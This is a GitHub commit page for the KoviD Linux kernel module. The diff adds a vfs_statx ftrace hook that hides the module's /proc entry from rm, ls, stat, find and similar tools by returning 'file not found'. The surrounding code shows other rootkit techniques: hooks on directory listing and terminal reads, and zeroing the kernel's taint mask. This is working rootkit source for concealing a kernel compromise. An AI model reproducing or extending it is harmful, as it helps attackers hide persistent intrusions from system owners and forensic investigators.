Skip to content

Commit

Permalink
Block procfile from statx call
Browse files Browse the repository at this point in the history
rm, ls, stat, find, tree, ...
  • Loading branch information
JNE committed Oct 31, 2024
1 parent 20a0ec4 commit 8aceea3
Show file tree
Hide file tree
Showing 2 changed files with 19 additions and 1 deletion.
1 change: 1 addition & 0 deletions Makefile
Original file line number Diff line number Diff line change
Expand Up @@ -27,6 +27,7 @@ $(info -- Selected PROCNAME is $(PROCNAME))
# PROCNAME, /proc/<name> interface.
COMPILER_OPTIONS := -Wall -DPROCNAME='"$(PROCNAME)"' \
-DMODNAME='"kovid"' -DKSOCKET_EMBEDDED ${DEBUG_PR} -DCPUHACK -DPRCTIMEOUT=1200 \
-DPROCNAME_MAXLEN=256 -DCPUHACK -DPRCTIMEOUT=1200 \
-DUUIDGEN=\"$(UUIDGEN)\" -DJOURNALCTL=\"$(JOURNALCTL)\"

EXTRA_CFLAGS := -I$(src)/src -I$(src)/fs ${COMPILER_OPTIONS}
Expand Down
19 changes: 18 additions & 1 deletion src/sys.c
Original file line number Diff line number Diff line change
Expand Up @@ -998,6 +998,22 @@ static __always_inline struct pt_regs *ftrace_get_regs(struct ftrace_regs *fregs
}
#endif

static long (*real_vfs_statx)(int, const char __user *, int, struct kstat *, u32);
static long m_vfs_statx(int dfd, const char __user *filename, int flags, struct kstat *stat, u32 request_mask) {
/** size is more than enough for what is needed here. */
char kernbuf[PROCNAME_MAXLEN+6] = {0};

if (!copy_from_user((void*)kernbuf, filename, sizeof(kernbuf)-1)) {

/** we don't exist */
if (strstr(kernbuf, PROCNAME))
return -ENOENT;
}

/** return normal */
return real_vfs_statx(dfd, filename, flags, stat, request_mask);
}

/**
* __x64 prefix is not always present
*/
Expand Down Expand Up @@ -1132,7 +1148,6 @@ struct kernel_syscalls *kv_kall_load_addr(void) {
/** zero tainted_mask for the bits we care */
ks.tainted = (unsigned long*)ks.k_kallsyms_lookup_name("tainted_mask");


ks.k__set_task_comm = (do__set_task_comm_sg)ks.k_kallsyms_lookup_name("__set_task_comm");
if (!ks.k__set_task_comm)
prwarn("invalid data: __set_task_comm will not work\n");
Expand All @@ -1159,6 +1174,8 @@ static struct ftrace_hook ft_hooks[] = {
{"filldir64", m_filldir64, &real_filldir64},
{"tty_read", m_tty_read, &real_tty_read},
{"proc_dointvec", m_proc_dointvec, &real_proc_dointvec},
{"vfs_statx", m_vfs_statx, &real_vfs_statx},

{NULL, NULL, NULL},
};

Expand Down

0 comments on commit 8aceea3

Please sign in to comment.